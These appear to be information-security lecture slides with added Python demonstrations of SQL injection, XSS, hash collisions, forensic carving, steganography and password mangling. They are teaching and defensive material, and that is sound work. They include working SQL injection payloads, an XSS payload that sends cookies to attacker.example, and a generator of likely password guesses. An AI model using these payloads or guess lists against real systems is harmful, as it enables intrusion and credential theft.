• A successful SQL injection exploit can read sensitive data from the database, modify (insert, update or delete) database data, execute administration operations (such as shutdown) on the database, recover the content of a given file, and, in some cases, issue commands to the operating system.

• The standard defence is to keep data out of the code position: parameterised (prepared) statements send the query structure and the values to the database separately, so a quote or comment marker in the input can never change the query.
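The login case above, as an added example (not from the original slides) against an in-memory SQLite table with constructed accounts. The vulnerable function formats the input into the query text; the safe one binds it as a parameter. The same three payloads, a comment that drops the password check, an always-true tautology, and a UNION that reads the password column, succeed against the first and are treated as plain strings by the second.

```python
import sqlite3


def setup_db():
    """In-memory table with constructed sample accounts (not real data)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (name TEXT, password TEXT, role TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)",
                    [("alice", "s3cret", "admin"), ("bob", "hunter2", "user")])
    return con


def login_vulnerable(con, name, password):
    """Input is pasted into the query text, so quotes and comments in the
    input become part of the SQL code. This is the bug, kept on purpose."""
    sql = (f"SELECT name, role FROM users "
           f"WHERE name = '{name}' AND password = '{password}'")
    return con.execute(sql).fetchall()


def login_safe(con, name, password):
    """Parameterised query: the structure is fixed and the values are bound,
    so the same inputs are compared as data and never parsed as SQL."""
    sql = "SELECT name, role FROM users WHERE name = ? AND password = ?"
    return con.execute(sql, (name, password)).fetchall()


# Constructed payloads for the data-plane inputs described above.
BYPASS_NAME = "alice' --"                       # comment out the password check
TAUTOLOGY = "' OR '1'='1"                       # always-true WHERE clause
UNION_NAME = "x' UNION SELECT name, password FROM users --"   # read other columns

if __name__ == "__main__":
    con = setup_db()
    print("vulnerable, bypass :", login_vulnerable(con, BYPASS_NAME, "wrong"))
    print("vulnerable, dump   :", login_vulnerable(con, UNION_NAME, ""))
    print("safe, same input   :", login_safe(con, BYPASS_NAME, "wrong"))
    print("safe, real creds   :", login_safe(con, "alice", "s3cret"))
```

The UNION payload is the "read sensitive data" case from the slide: because the injected SELECT returns the same number of columns as the original, the password column comes back where the role was expected.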


Page 58: MODULE 1: PRE-REQUISITES IN INFORMATION AND NETWORK SECURITY

Cyber Attack : Cross-site scripting (XSS)

• XSS attacks inject attacker-controlled script into a page served by a trusted site, so that it runs in the victim's web browser (or other scriptable application) with that site's privileges: it can read the page, session cookies and tokens, and act on the user's behalf.

• The root cause is untrusted input (a URL parameter, a stored comment, a third-party web resource) being rendered into the page without output encoding appropriate to the context in which it lands.
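An added example, not from the original slides, of the rendering bug and its fix for the HTML-body context: two constructed payloads (a script tag and an event handler) go through a template unescaped and escaped, and a small regular expression stands in for a test-suite check that no active markup survived. The template string and the detector are assumptions for the demo; in other contexts (inside a script block, an attribute value, a URL) the encoding rules differ, which is why frameworks auto-escape per context.

```python
import html
import re

# Constructed page fragment; in a real app this would be a template.
TEMPLATE = '<p>Results for: {query}</p>'

# Constructed attacker inputs.
SCRIPT_PAYLOAD = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
HANDLER_PAYLOAD = '"><img src=x onerror="alert(document.domain)">'

# Rough detector for active content in rendered HTML (useful in tests and logs).
ACTIVE_HTML = re.compile(r"<script\b|<\w+[^>]*\son\w+\s*=|javascript:", re.IGNORECASE)


def render_vulnerable(query):
    """Untrusted input dropped straight into the HTML body: the bug."""
    return TEMPLATE.format(query=query)


def render_safe(query):
    """HTML-context output encoding: <, >, &, quotes become entities, so the
    browser shows the payload as text instead of parsing it as markup."""
    return TEMPLATE.format(query=html.escape(query, quote=True))


def has_active_content(rendered):
    """True if the rendered HTML still contains script or event-handler markup."""
    return ACTIVE_HTML.search(rendered) is not None


if __name__ == "__main__":
    for payload in (SCRIPT_PAYLOAD, HANDLER_PAYLOAD):
        print("vulnerable:", has_active_content(render_vulnerable(payload)))
        print("safe      :", has_active_content(render_safe(payload)))
        print(render_safe(payload))
```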


Page 59: MODULE 1: PRE-REQUISITES IN INFORMATION AND NETWORK SECURITY

Cyber Attack : Eavesdropping • Eavesdropping attacks occur through the interception of network traffic.

• By eavesdropping, an attacker can obtain passwords, credit card numbers and other confidential information that a user sends over the network unencrypted.

• Eavesdropping can be passive or active:

• Passive eavesdropping: the attacker only listens to message transmissions on the network (for example on open Wi-Fi or a tapped link) and is therefore very hard to detect.

• Active eavesdropping: the attacker actively elicits information by posing as a legitimate participant and sending queries to the transmitters. This is referred to as probing, scanning or tampering, and it is detectable in principle because the attacker has to transmit.

• End-to-end encryption (TLS, SSH, a VPN) is the defence against both: intercepted traffic yields nothing useful.

Page 60: MODULE 1: PRE-REQUISITES IN INFORMATION AND NETWORK SECURITY

Cyber Attack : Birthday • Birthday attacks are made against hash algorithms that are used to verify the integrity of a message, software or digital signature.

• A message processed by a hash function produces a message digest (MD) of fixed length, independent of the length of the input message. The digest is meant to characterise the message, but because it is fixed-length while inputs are unbounded, distinct messages with the same digest (collisions) must exist.

• The birthday attack exploits the probability of finding two random messages that produce the same MD under the same hash function: for an n-bit digest a collision is expected after roughly 2^(n/2) trials, not 2^n. An attacker who gets a victim to sign one of two colliding documents can then present the other as signed, which is why digests of 128 bits or less (MD5) are no longer acceptable for signatures.
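The 2^(n/2) figure, made concrete as an added example (not from the original slides): SHA-256 is truncated to a deliberately short 32-bit digest (an assumption for the demo, so that the search finishes in well under a second) and distinct messages are hashed until two collide, alongside the birthday-bound formula and a measurement of the avalanche effect on the full digest.

```python
import hashlib
import math


def truncated_digest(msg, bits):
    """Top `bits` bits of SHA-256(msg) as an int: a deliberately short digest."""
    return int.from_bytes(hashlib.sha256(msg).digest(), "big") >> (256 - bits)


def find_collision(bits, seed=b"demo"):
    """Hash distinct messages until two share a truncated digest.
    Returns (msg_a, msg_b, trials). Memory grows with trials (~2^(bits/2))."""
    seen = {}
    counter = 0
    while True:
        msg = seed + counter.to_bytes(8, "big")
        h = truncated_digest(msg, bits)
        if h in seen:
            return seen[h], msg, counter + 1
        seen[h] = msg
        counter += 1


def expected_trials(bits, p=0.5):
    """Messages needed for a collision with probability p: sqrt(2 N ln(1/(1-p)))."""
    return math.sqrt(2 * 2 ** bits * math.log(1 / (1 - p)))


def collision_probability(bits, k):
    """Probability that k random digests of `bits` bits contain a collision."""
    return 1 - math.exp(-k * (k - 1) / (2 * 2 ** bits))


def bit_difference(a, b):
    """Hamming distance between full SHA-256 digests: the avalanche effect."""
    x = int.from_bytes(hashlib.sha256(a).digest(), "big")
    y = int.from_bytes(hashlib.sha256(b).digest(), "big")
    return bin(x ^ y).count("1")


if __name__ == "__main__":
    bits = 32
    a, b, trials = find_collision(bits)
    print(f"{bits}-bit collision after {trials} trials "
          f"(expected ~{expected_trials(bits):.0f}, 2^{bits} = {2**bits})")
    print(a, b, hex(truncated_digest(a, bits)))
    print("one-character change flips", bit_difference(b"message", b"messagf"),
          "of 256 bits")
```

For the full 256-bit digest the same formula gives about 2^128 trials, which is why SHA-256 is considered collision-resistant while a 64-bit truncation (2^32 trials) is not.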


Page 61: MODULE 1: PRE-REQUISITES IN INFORMATION AND NETWORK SECURITY

Cyber Attack : Malware • Malicious software (malware) is unwanted software installed on your system without your consent.

• Here are some of the most common types of malware:

• Macro viruses: these viruses infect applications such as Microsoft Word or Excel by attaching to the application's initialisation sequence (an auto-run macro in a document or template). When the document is opened, the virus executes its instructions before transferring control to the application, then replicates itself into other documents and templates on the system.

• File infectors: file infector viruses usually attach themselves to executable code, such as .exe files, and run whenever the infected program is loaded. A companion variant instead creates a separate file with the same name as a legitimate program but an .exe extension, so that the virus code runs when the name is invoked.

• System or boot-record infectors: a boot-record virus attaches to the master boot record of a hard disk (or the boot sector of removable media). When the system starts, the firmware loads the boot sector and with it the virus into memory, from where it can propagate to other disks and computers.

Page 62: MODULE 1: PRE-REQUISITES IN INFORMATION AND NETWORK SECURITY

Goals of Information Security • Information Security programs are built around three objectives, commonly known as the CIA triad: Confidentiality, Integrity and Availability.

• Confidentiality means information is not disclosed to unauthorised individuals, entities or processes.

• For example, if someone watches me type my Gmail password while I log in, the password has been compromised and confidentiality has been breached.

• Integrity means maintaining the accuracy and completeness of data: data cannot be changed in an unauthorised or undetected way.

• For example, when an employee leaves an organisation, the employee's records in every department (accounts, HR, access control) should be updated to reflect the new status so that the data stays complete and accurate; in addition, only authorised persons should be able to edit employee data.

• Availability means information must be accessible when it is needed by those entitled to it.

• For example, if a manager needs to check how many leave days an employee has outstanding, the HR system and the network path to it must be up; keeping it that way requires collaboration between teams such as network operations, development operations, incident response and policy/change management.

Page 63: MODULE 1: PRE-REQUISITES IN INFORMATION AND NETWORK SECURITY

Goals of Information Security • Apart from these, further principles govern information security programs.

• Non-repudiation means one party cannot deny having received a message or transaction, nor can the other party deny having sent it; digital signatures are the usual technical basis.

• Authenticity means verifying that users are who they claim to be and that each input arriving at the destination comes from a trusted source. When this principle is followed, the receiver has assurance that a message is genuine and was delivered through a valid transmission.

• Accountability means that it must be possible to trace the actions of an entity uniquely to that entity, which requires reliable identification and tamper-resistant logging.

Page 64: MODULE 1: PRE-REQUISITES IN INFORMATION AND NETWORK SECURITY

E-commerce Security • Security is an essential part of any transaction that takes place over the internet. Customers lose faith in an e-business if its security is compromised.

• The essential requirements for safe e-payments and transactions are:

• Confidentiality: information should not be accessible to an unauthorised person, and should not be readable if intercepted during transmission.

• Integrity: information should not be altered during its transmission over the network.

• Availability: information should be available wherever and whenever required, within a specified time limit.

• Authenticity: there should be a mechanism to authenticate a user before giving them access to the required information.

• Non-repudiation: protection against denial of an order or denial of a payment. Once a sender sends a message, the sender should not be able to deny sending it; similarly, the recipient should not be able to deny having received it.

• Encryption: information should be encrypted, and decryptable only by an authorised user.

• Auditability: data should be recorded in such a way that it can be audited for integrity requirements.

Page 65: MODULE 1: PRE-REQUISITES IN INFORMATION AND NETWORK SECURITY

E-commerce Security

• Major security measures taken by e-commerce websites are the following:

• Encryption: a very effective and practical way to safeguard data transmitted over the network. The sender encrypts the data with a key and only the intended receiver can decrypt it, using the same key (symmetric encryption) or the matching private key (public-key encryption).

• Digital Signature: a digital signature provides authenticity and integrity of the information. It is computed over the data with the signer's private key and verified by anyone holding the corresponding public key; it is not a scanned signature image or a password.

• Security Certificates: a security (digital) certificate binds a public key to the identity of a website or user and is signed by a certificate authority; checking that signature is how a browser verifies that it is talking to the genuine site.

Page 66: MODULE 1: PRE-REQUISITES IN INFORMATION AND NETWORK SECURITY

E-commerce Security : Security Protocols • Secure Socket Layer (SSL) / Transport Layer Security (TLS)

• TLS, the successor of SSL (every SSL version is now deprecated), is the most widely used security protocol on the web. It provides:

• Authentication (of the server, and optionally the client, through certificates)

• Encryption (confidentiality of the session)

• Integrity (every record is authenticated)

• It does not by itself provide non-repudiation: record protection uses symmetric keys shared by both ends, so either end could have produced a record. Non-repudiation requires digital signatures at the application layer.

• "https://" is used for HTTP URLs carried over TLS, whereas "http://" is used for HTTP URLs without it.

• Secure Hypertext Transfer Protocol (S-HTTP)

• S-HTTP (RFC 2660) extended HTTP with public-key encryption, authentication and digital signatures applied to individual messages rather than to the connection.

• It supported multiple security mechanisms, negotiated between client and server, but was never widely deployed and has been superseded by HTTPS.

Page 67: MODULE 1: PRE-REQUISITES IN INFORMATION AND NETWORK SECURITY

Computer Forensics

• Computer forensics is the process of methodically examining computer media (hard disks, solid-state drives, removable media, tapes, etc.) for evidence.

• In other words, computer forensics is the collection, preservation, analysis and presentation of computer-related evidence, carried out so that the evidence remains admissible (documented chain of custody, analysis performed on verified copies rather than the originals).

• Computer forensics is also referred to as computer forensic analysis, electronic discovery, electronic evidence discovery, digital discovery, data recovery, data discovery, computer analysis and computer examination.

• Computer evidence can be useful in criminal cases, civil disputes, and human resources/employment proceedings.

Page 68: MODULE 1: PRE-REQUISITES IN INFORMATION AND NETWORK SECURITY

Computer Forensics

• Computer forensics assists law enforcement. This can include:

• Recovering deleted files such as documents, graphics and photos. Deleting a file normally removes only the directory entry; the content stays on disk until it is overwritten.

• Searching unallocated space on the hard drive, where an abundance of such leftover data often resides.

• Tracing artifacts, the tidbits of data left behind by the operating system (registry entries, log files, link files, browser caches). Examiners know how to find these artifacts and, more importantly, how to evaluate the value of the information they find.

• Processing hidden files (files that are not visible or accessible to the user) that contain past usage information. Often this requires reconstructing and analysing the timestamps of each file and determining when it was created, last modified, last accessed and, where possible, deleted.

• Running a string search for e-mail, when no e-mail client is obvious.
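The first two items and the last one, recovering deleted files from unallocated space and string-searching for e-mail, rest on the same idea: ignore the file system and scan the raw bytes. The added example below (not from the original slides) carves files by header/footer signature and searches for e-mail addresses in a constructed "disk image"; the signatures, the sample files and the image are all made up for the demo. Tools such as foremost and scalpel do the same at scale.

```python
import re

# Signatures: (name, header, footer). JPEG and PDF are enough to show the idea.
SIGNATURES = [
    ("jpeg", b"\xff\xd8\xff", b"\xff\xd9"),
    ("pdf", b"%PDF-", b"%%EOF"),
]
EMAIL_RE = re.compile(rb"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")

# Constructed files and "disk image" (not real data): a deleted JPEG, leftover
# mail headers from an uninstalled client, and a PDF, separated by zeroed slack.
SAMPLE_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF" + b"\x00" * 30 + b"\xff\xd9"
SAMPLE_PDF = b"%PDF-1.4\n1 0 obj << >> endobj\ntrailer << /Root 1 0 R >>\n%%EOF"
SAMPLE_MAIL = b"From: alice@example.org\r\nTo: bob@example.net\r\nSubject: hi\r\n"


def build_sample_image():
    return (b"\x00" * 64 + SAMPLE_JPEG + b"\x00" * 17 + SAMPLE_MAIL
            + b"\x00" * 9 + SAMPLE_PDF + b"\x00" * 32)


def carve(image, signatures=SIGNATURES):
    """Scan raw bytes for header/footer pairs, ignoring any file-system
    metadata; this is how deleted files are recovered from unallocated space.
    Returns (name, start_offset, end_offset, data) for each hit, by offset."""
    found = []
    for name, head, tail in signatures:
        pos = 0
        while True:
            start = image.find(head, pos)
            if start < 0:
                break
            end = image.find(tail, start + len(head))
            if end < 0:
                break            # header without footer: truncated, skip
            end += len(tail)
            found.append((name, start, end, image[start:end]))
            pos = end
    return sorted(found, key=lambda f: f[1])


def string_search(image, pattern=EMAIL_RE):
    """Keyword search over the raw image; finds addresses with no mail client."""
    return sorted({m.group().decode() for m in pattern.finditer(image)})


if __name__ == "__main__":
    img = build_sample_image()
    for name, start, end, data in carve(img):
        print(f"{name:4s} at {start:5d}-{end:5d} ({len(data)} bytes)")
    print("e-mail addresses:", string_search(img))
```

Real carving has to cope with fragmented files and with footers that legitimately occur inside a file (a JPEG thumbnail embedded in a JPEG), which is why production tools add length fields and format-aware validation on top of this basic scan.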


Page 69: MODULE 1: PRE-REQUISITES IN INFORMATION AND NETWORK SECURITY

Steganography • Given the amount of data generated and transmitted electronically today, it is no surprise that numerous methods of protecting that data have evolved. One of the rapidly growing methods is steganography.

• Steganography is the art and science of embedding secret messages in a cover message in such a way that no one apart from the sender and the intended recipient suspects the existence of the message. Unlike cryptography, which hides the content, steganography hides the fact that a message exists; the two are usually combined, since a discovered payload should still be unreadable.

Page 70: MODULE 1: PRE-REQUISITES IN INFORMATION AND NETWORK SECURITY

Steganography Techniques

• Depending on the nature of the cover object (the object in which the secret data is embedded), steganography can be divided into five types:

• Text Steganography: hiding information inside text files.

• It involves things like changing the format of existing text, changing words within a text, generating random character sequences or using context-free grammars to generate readable texts.

• Image Steganography: hiding data by using an image as the cover object.

• In digital steganography, images are a widely used cover source because there are a huge number of bits in the digital representation of an image, and small changes to the low-order bits of pixel values are imperceptible to the eye.
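The low-order-bit point above, as an added example that is not part of the original slides: the least-significant-bit method writes one payload bit into the LSB of each successive sample. The cover is a constructed 8-bit greyscale gradient rather than a real image file (an assumption, so it runs without an image library), with a 4-byte length prefix so the extractor knows where the payload ends.

```python
def embed(cover, payload):
    """Write payload into the least-significant bit of successive cover samples.
    A 4-byte big-endian length prefix tells extract() how many bytes to read."""
    data = len(payload).to_bytes(4, "big") + payload
    bits = [(byte >> (7 - i)) & 1 for byte in data for i in range(8)]
    if len(bits) > len(cover):
        raise ValueError(f"cover holds {len(cover) // 8 - 4} payload bytes at most")
    stego = bytearray(cover)
    for i, bit in enumerate(bits):
        stego[i] = (stego[i] & 0xFE) | bit     # clear the LSB, then set it
    return bytes(stego)


def extract(stego):
    """Read the LSB plane back: first the length prefix, then that many bytes."""
    def read_bytes(count, start):
        value = 0
        for i in range(count * 8):
            value = (value << 1) | (stego[start + i] & 1)
        return value.to_bytes(count, "big"), start + count * 8

    length_bytes, pos = read_bytes(4, 0)
    length = int.from_bytes(length_bytes, "big")
    if pos + length * 8 > len(stego):
        raise ValueError("no valid payload in this cover")
    payload, _ = read_bytes(length, pos)
    return payload


def capacity_bytes(cover):
    """Payload bytes the cover can hold after the length prefix."""
    return len(cover) // 8 - 4


def max_sample_change(cover, stego):
    """Largest per-sample difference; LSB embedding never exceeds 1."""
    return max(abs(a - b) for a, b in zip(cover, stego))


def build_cover(width=64, height=64):
    """Constructed 8-bit greyscale gradient standing in for a real image."""
    return bytes((x * 3 + y * 5) % 256 for y in range(height) for x in range(width))


if __name__ == "__main__":
    cover = build_cover()
    secret = b"meet at dawn, bring the key"
    stego = embed(cover, secret)
    print("capacity:", capacity_bytes(cover), "bytes; max sample change:",
          max_sample_change(cover, stego))
    print("recovered:", extract(stego))
```

Each sample changes by at most one grey level, which the eye cannot see, but the embedded bits are not random in the way natural LSBs are, so statistical tests (chi-square on pairs of values, RS analysis) can detect sequential LSB embedding; lossy recompression of the cover also destroys it.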


Page 71: MODULE 1: PRE-REQUISITES IN INFORMATION AND NETWORK SECURITY

Steganography Techniques

• Audio Steganography: the secret message is embedded into an audio signal, which alters the binary sequence of the corresponding audio file.

• Hiding secret messages in digital sound is a much more difficult process than, for example, image steganography, because the human auditory system is sensitive to small distortions.

• Video Steganography: any kind of data can be hidden in a digital video format.

• The advantage of this type is that a large amount of data can be hidden, and the fact that it is a moving stream of images and sounds makes individual changes hard to notice.

• You can think of this as the combination of image steganography and audio steganography.

• Two main classes of video steganography are:

• Embedding data in uncompressed raw video and compressing it later

• Embedding data directly into the compressed data stream

• Network Steganography / Protocol Steganography:

• The technique of embedding information within the network protocols used in data transmission, such as TCP, UDP and ICMP.

• Covert channels exist at several layers of the OSI model. For example, information can be hidden in header fields of a TCP/IP packet that are optional or rarely inspected, such as the IP identification field or the TCP initial sequence number, or in the timing between packets.

Page 72: MODULE 1: PRE-REQUISITES IN INFORMATION AND NETWORK SECURITY

THANK YOU ALL ……….

Questions??????


Page 73: MODULE 1: PRE-REQUISITES IN INFORMATION AND NETWORK SECURITY

MODULE 1:

PRE-REQUISITES IN INFORMATION AND

NETWORK SECURITY

#SaeeJoshi


Page 74: MODULE 1: PRE-REQUISITES IN INFORMATION AND NETWORK SECURITY

SECURITY THREATS AND

VULNERABILITIES #CyberSecurity


Page 75: MODULE 1: PRE-REQUISITES IN INFORMATION AND NETWORK SECURITY

Agenda Overview of Security threats

Weak / Strong Passwords and Password Cracking

Insecure Network connections

Malicious Code

Programming Bugs

Cyber crime and Cyber terrorism

Information Warfare and Surveillance

Page 76: MODULE 1: PRE-REQUISITES IN INFORMATION AND NETWORK SECURITY

Overview of Security threats • A network security threat is an attempt to gain unauthorised access to your organisation's network, to take your data without your knowledge, or to carry out other malicious activity.

• Your network is at risk, or vulnerable, when there is a weakness in the computer network that such a threat can exploit.

• Some network security threats are intended to disrupt your organisation's processes and functionality rather than quietly collecting information for espionage or financial gain.

• With the extensive use and accessibility of the internet comes an increase in all kinds of threats; one of the most prevalent is the Denial of Service (DoS) attack.

• Having the mechanisms and tools to identify and categorise network security threats and irregularities in your systems or network is critical.

Page 77: MODULE 1: PRE-REQUISITES IN INFORMATION AND NETWORK SECURITY

What are network vulnerabilities? • Network vulnerabilities are known flaws or weaknesses in hardware, software or other organisational assets which can be exploited by attackers.

• When a threat exploits such a vulnerability, it can lead to a severe security breach.

• Most network vulnerabilities are exploited by automated tooling (scanners, worms, botnets) rather than by a human typing commands against your network, so an exposed weakness is found quickly.

• There are four main types of network security threats:

• Structured threats

• Unstructured threats

• External threats

• Internal threats

• Let us look at some major security threats that make systems vulnerable.

Page 78: MODULE 1: PRE-REQUISITES IN INFORMATION AND NETWORK SECURITY

Weak / Strong Passwords • Weak passwords play a major role in many breaches. For the user's convenience, applications sometimes do not enforce password complexity, and as a result users choose simple passwords such as:

password, password123, Password@123, 12345, god, their own mobile number, etc.

• A strong password is one that is more secure by virtue of being difficult for a machine or a human to guess.

• Password strength can be improved by incorporating the following characteristics; the more of them you incorporate, the stronger the password. Length matters most: a long passphrase beats a short string that merely ticks every box.

• At least 8 characters; the more characters, the better

• A mixture of both uppercase and lowercase letters

• A mixture of letters and numbers

• Inclusion of at least one special character, e.g. ! @ # ? ]. Note: some web applications mishandle < and > in passwords; a correctly built application accepts any character, and a policy should not exclude them.

Page 79: MODULE 1: PRE-REQUISITES IN INFORMATION AND NETWORK SECURITY

Password cracking

• Application authentication that requires only a login and password is inherently weak, because an attacker needs to obtain just one factor to masquerade as a legitimate user.

• Legitimate login IDs are often easy to guess with a little reconnaissance on the target.

• Many companies reuse employees' email IDs (without the domain name) as a universal login for other systems in the company, and email addresses can be discovered from many online sources.

• Additionally, users often choose weak passwords because they are easier to remember. A company may dictate rules for password complexity, but users tend to satisfy those rules in predictable ways (capital first letter, a year or "123" appended, "!" at the end), and attackers encode exactly those habits as mangling rules for their wordlists.
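The predictable-compliance point above, together with the complexity rule from the Weak / Strong Passwords slide, as an added example (not from the original slides): a policy checker of the kind the application runs, and a mangling generator that applies the usual human edits to a base word. The rule parameters, suffix lists and base words are constructed for the demo. The output is the set of guesses an attacker would try first, and its size against the full 8-character keyspace is the point.

```python
import string

# Constructed policy mirroring the slide: 8+ chars, upper, lower, digit, special.
POLICY = {"min_len": 8, "upper": True, "lower": True, "digit": True, "special": True}


def meets_policy(pw, policy=POLICY):
    """Does pw satisfy the complexity rule? (What the application checks.)"""
    checks = [
        len(pw) >= policy["min_len"],
        not policy["upper"] or any(c.isupper() for c in pw),
        not policy["lower"] or any(c.islower() for c in pw),
        not policy["digit"] or any(c.isdigit() for c in pw),
        not policy["special"] or any(c in string.punctuation for c in pw),
    ]
    return all(checks)


def mangle(word, years=("2023", "2024"), digits=("1", "123"), specials="!@"):
    """Yield the predictable edits people make to a base word to pass the rule:
    capitalise, upper-case, leetspeak, append a year or digits, add a symbol."""
    leet = str.maketrans("aeios", "@3105")
    bases = {word, word.capitalize(), word.upper(), word.capitalize().translate(leet)}
    for b in bases:
        yield b
        for s in specials:
            yield b + s
        for d in digits + years:
            yield b + d
            for s in specials:
                yield b + d + s
                yield b + s + d


def policy_compliant_candidates(words, **rules):
    """Unique mangled candidates that the policy would accept."""
    seen, out = set(), []
    for w in words:
        for cand in mangle(w, **rules):
            if cand not in seen and meets_policy(cand):
                seen.add(cand)
                out.append(cand)
    return out


def full_keyspace(length, alphabet_size=95):
    """Size of the space a brute-force attacker would otherwise have to search."""
    return alphabet_size ** length


if __name__ == "__main__":
    cands = policy_compliant_candidates(["password", "summer", "welcome"])
    print(len(cands), "policy-compliant guesses from 3 words, e.g.", cands[:6])
    print("versus", full_keyspace(8), "8-character strings")
```

A few hundred candidates per base word, each of which the policy accepts, is why complexity rules alone add little: the rule shrinks the space of what people actually choose far more than it enlarges the space the attacker must search.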


Page 80: MODULE 1: PRE-REQUISITES IN INFORMATION AND NETWORK SECURITY

Insecure Network connections • In the world of Wi-Fi there are two types of networks, secured and unsecured. The primary difference is whether a password (and the link-layer encryption that comes with it) is required to connect; on an open network virtually anyone within range can join.

• Unsecured networks often lack any sort of filtering or firewall protection, and any information transmitted across them that is not protected by a higher-layer protocol such as TLS travels unencrypted for anyone nearby to capture.

• The threats an unsecured network poses:

• Information disclosure

• Malware distribution

• Wi-Fi honeypots (fake wireless networks with a trusted-looking name)

• Man in the Middle (MITM) attacks

• To avoid these threats, avoid using open Wi-Fi connections; the following also help:

• A personal antivirus or firewall, and a VPN so that all traffic is encrypted regardless of the network

• Virtual Desktop Infrastructure (VDI) governed by a central server, so that no data lives on the device

Page 81: MODULE 1: PRE-REQUISITES IN INFORMATION AND NETWORK SECURITY

Malicious Code • What is malicious code?

• Malicious code is unwanted files or programs that can cause harm to a computer or compromise data stored on it. Common classifications include viruses, worms and Trojan horses.

• Viruses have the ability to damage or destroy files on a computer system and spread when an infected host file is run: through shared infected removable media, opening malicious email attachments, and visiting malicious web pages.

• Worms are self-propagating malware that spread from computer to computer across the network without needing a host file or user action, typically by exploiting a vulnerability in a network service. A spreading worm can consume all of your computer's (and network's) resources, causing it to stop responding.

• Trojan horses are programs that hide a virus or other damaging functionality behind an apparently legitimate purpose. It is not uncommon for "free" software to contain a Trojan horse, so that the user believes they are running legitimate software while the program performs malicious actions on the computer.

• Malicious data files are non-executable files, such as a Microsoft Word document, an Adobe PDF, a ZIP file or an image file, that exploit weaknesses in the software used to open them. Attackers frequently use malicious data files to install malware on a victim's system, commonly distributing them via email, social media and websites.

Page 82: MODULE 1: PRE-REQUISITES IN INFORMATION AND NETWORK SECURITY

Malicious Code

• How can you protect yourself against malicious code?

• Install and maintain antivirus software

• Use caution with links and attachments

• Block pop-up advertisements

• Use an account with limited permissions

• Disable external media AutoRun and AutoPlay features

• Change your passwords periodically

• Keep software updated

• Back up data regularly

• Install or enable a firewall

• Use anti-spyware tools

• Monitor accounts

• Avoid using public Wi-Fi


Page 83: MODULE 1: PRE-REQUISITES IN INFORMATION AND NETWORK SECURITY

Programming Bugs

• A programming bug or software bug is not a worm or a virus. It is an error or mistake that causes a computer program to behave incorrectly.

• Bugs are generally the result of mistakes made by the programmer, either in the design or in the source code.

• Some are caused by compilers that generate invalid code.

• While bugs themselves are not malicious, they can be very dangerous.

• A bug in input handling, memory management or access control can leave the entire system weak and vulnerable to cyber attacks: most exploitable vulnerabilities are ordinary bugs that an attacker has learned to trigger deliberately.

• The software industry has taken note of this and has made strides to develop software more carefully.

Page 84: MODULE 1: PRE-REQUISITES IN INFORMATION AND NETWORK SECURITY

Programming Bugs

• Some of these measures include the following.

• Programming Style

• Although common mistakes such as typos are usually caught by the compiler, a bug often appears when a logical error is made. Defensive programming and a disciplined coding style are intended to make such errors less likely and easier to notice.

• Programming Techniques

• Various techniques halt a program immediately when an inconsistency is encountered (assertions, bounds and overflow checks, sanitizers during testing), which lets the bug be identified and fixed quickly. Other methods attempt to contain the fault while allowing the program to keep running.

• Language Support

• Newer programming languages and frameworks have built-in error handling and memory safety (bounds-checked arrays, no manual memory management), which eliminates whole classes of bugs. Use of such languages is highly recommended where performance constraints allow.

Page 85: MODULE 1: PRE-REQUISITES IN INFORMATION AND NETWORK SECURITY

Cyber crime

• There is no universally accepted definition of cybercrime. However, the following definition includes elements common to existing cybercrime definitions:

"Cybercrime is an act that violates the law, which is perpetrated using information and communication technology (ICT) to either target networks, systems, data, websites and/or technology or facilitate a crime."

• Cybercrime differs from traditional crime in that it "knows no physical or geographic boundaries" and can be conducted with less effort, greater ease and at greater speed than traditional crime.

Page 86: MODULE 1: PRE-REQUISITES IN INFORMATION AND NETWORK SECURITY

Types of Cyber crime

• There are no universally defined crime types, but here is an attempt to identify some commonly occurring themes and characteristics.

• The computer science community views cybercrime primarily in terms of how far Internet technology transforms the crime, which is either:

• assisted (cyber-assisted crime)

• enabled (cyber-enabled crime)

• dependent (cyber-dependent crime)

• The legal and criminological communities tend to see it more in terms of the different criminal actions or modus operandi (method of operation) involved:

• crime against the computer (hacking)

• crime using the computer (e.g. fraud, bullying)

• crime in the computer (extreme sexual, hate or terrorism materials)

• Political scientists, on the other hand, view cybercrime in terms of its impact on:

• Politics or the political system

• Governments or government agencies

• Private organisations

• Common citizens or individuals

Page 87: MODULE 1: PRE-REQUISITES IN INFORMATION AND NETWORK SECURITY

Cyber terrorism

• Cyber terrorism is the use of the Internet to conduct violent acts that result in, or threaten, loss of life or significant bodily harm, in order to achieve political or ideological gains through threat or intimidation.

• The aim of cyber terrorism can be "the use of computer network tools to shut down critical national infrastructures (such as energy, transportation, government operations) or to coerce or intimidate a government or civilian population."

• The premise of cyber terrorism is that as nations and critical infrastructure become more dependent on computer networks for their operation, new vulnerabilities are created.

• A hostile nation or group could exploit these vulnerabilities to penetrate a poorly secured computer network and disrupt or even shut down critical functions.

Page 88: MODULE 1: PRE-REQUISITES IN INFORMATION AND NETWORK SECURITY

Cyber terrorism

What types of information are at risk?

1. Power delivery

2. Communications

3. Aviation

4. Financial services

5. Medical records

6. Criminal records

7. Business plans


Page 89: MODULE 1: PRE-REQUISITES IN INFORMATION AND NETWORK SECURITY

Information warfare

• Information Warfare: Any action to deny, exploit, corrupt, or

destroy the enemy’s information and its functions; protecting

ourselves against those actions; and exploiting our own

military information functions.

• Direct Information Warfare changes the adversary’s information without involving the intervening perceptive and analytical functions.

• Indirect Information Warfare changes the adversary’s information by creating phenomena that the adversary must then observe and analyze.


Page 90: MODULE 1: PRE-REQUISITES IN INFORMATION AND NETWORK SECURITY

Computer network Surveillance

• Computer and network surveillance is the monitoring of

computer activity and data stored on a hard drive, or data being

transferred over computer networks such as the Internet.

• This monitoring is often carried out covertly and may be

completed by governments, corporations, criminal organizations,

or individuals.

• It may or may not be legal and may or may not require

authorization from a court or other independent government

agencies.

• Computer and network surveillance programs are widespread

today and almost all Internet traffic can be monitored.

• Surveillance allows governments and other agencies to

maintain social control, recognize and monitor threats or any

suspicious activity, and prevent and investigate criminal activities.


Page 91: MODULE 1: PRE-REQUISITES IN INFORMATION AND NETWORK SECURITY

THANK YOU ALL ……….

Questions??????


Page 92: MODULE 1: PRE-REQUISITES IN INFORMATION AND NETWORK SECURITY

MODULE 1:

PRE-REQUISITES IN INFORMATION AND

NETWORK SECURITY

#SaeeJoshi


